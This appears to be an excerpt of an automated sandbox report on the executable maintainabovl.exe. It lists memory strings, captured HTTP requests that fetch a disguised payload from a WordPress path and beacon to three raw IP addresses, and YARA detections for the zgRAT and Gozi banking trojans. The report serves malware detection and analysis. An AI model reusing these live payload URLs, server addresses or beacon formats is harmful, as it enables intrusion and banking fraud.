Source: maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360368772.0000000005B48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn3
Source: maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnr
Source: maintainabovl.exe, 00000001.00000003.360316834.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnved3
Source: maintainabovl.exe, 00000001.00000003.364771960.0000000005B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/6
                  Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/U
                  Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/L
                  Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/g
                  Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
                  Source: maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                  Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-
                  Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/q
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360947397.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360260221.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com2
                  Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359434008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359460008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com3
                  Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360947397.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360260221.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comiv
                  Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359434008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359460008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comt
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                  Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                  Source: maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://christianbeltran.co
                  Source: maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000000.357229830.0000000000842000.00000002.00000001.01000000.00000004.sdmp, maintainabovl.exe.0.dr | String found in binary or memory: https://christianbeltran.co/wp-admin/images/css/ground/bo/Zujiies.png
                  Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/json
                  Source: maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: unknown | DNS traffic detected: queries for: christianbeltran.co
                  Source: global traffic | HTTP traffic detected: GET /wp-admin/images/css/ground/bo/Zujiies.png HTTP/1.1
                      Host: christianbeltran.co
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 62.173.149.202
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /drew/OUUsBzpIZZUphm/Tsj7lOWVT01GR7_2B_2F3/h1YqNuP4WcrzeCJs/x51Rts0xb3FAs1_/2Bxw1CaQKlICTyuLN1/TaoUc8_2F/5TTXCIOA0SRbwyts6JTK/R5MlMx5IeVFFgmHEPpZ/TWM7GdLrJHM_2B3S8B1eU7/_2BBh5oB1R_2F/_2BxltWj/_2BLEoNYS3p4VDy7elM9qu2/U5PEBiMSrU/T6YOXvs_2FZLXPTA3/hObNStGHJyyy/hCCoXchnbdJ/ixUgp0U2WECwia/6eVsNKM8Cmg7_2F7HmThU/LsrExo0WJYro/O9pQu.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 31.41.44.158
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 193.0.178.157
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                  Source: unknown | HTTPS traffic detected: 174.142.60.54:443 -> 192.168.2.4:49695 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: Yara match | File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  E-Banking Fraud

                  Source: Yara match | File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_010952F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError | 7_2_010952F6

                  System Summary

                  Source: 1.2.maintainabovl.exe.3d42f70.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 1.2.maintainabovl.exe.3d82f90.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 1.2.maintainabovl.exe.c0e0000.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                  Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: 1.2.maintainabovl.exe.3d42f70.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 1.2.maintainabovl.exe.3d82f90.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 1.2.maintainabovl.exe.c0e0000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
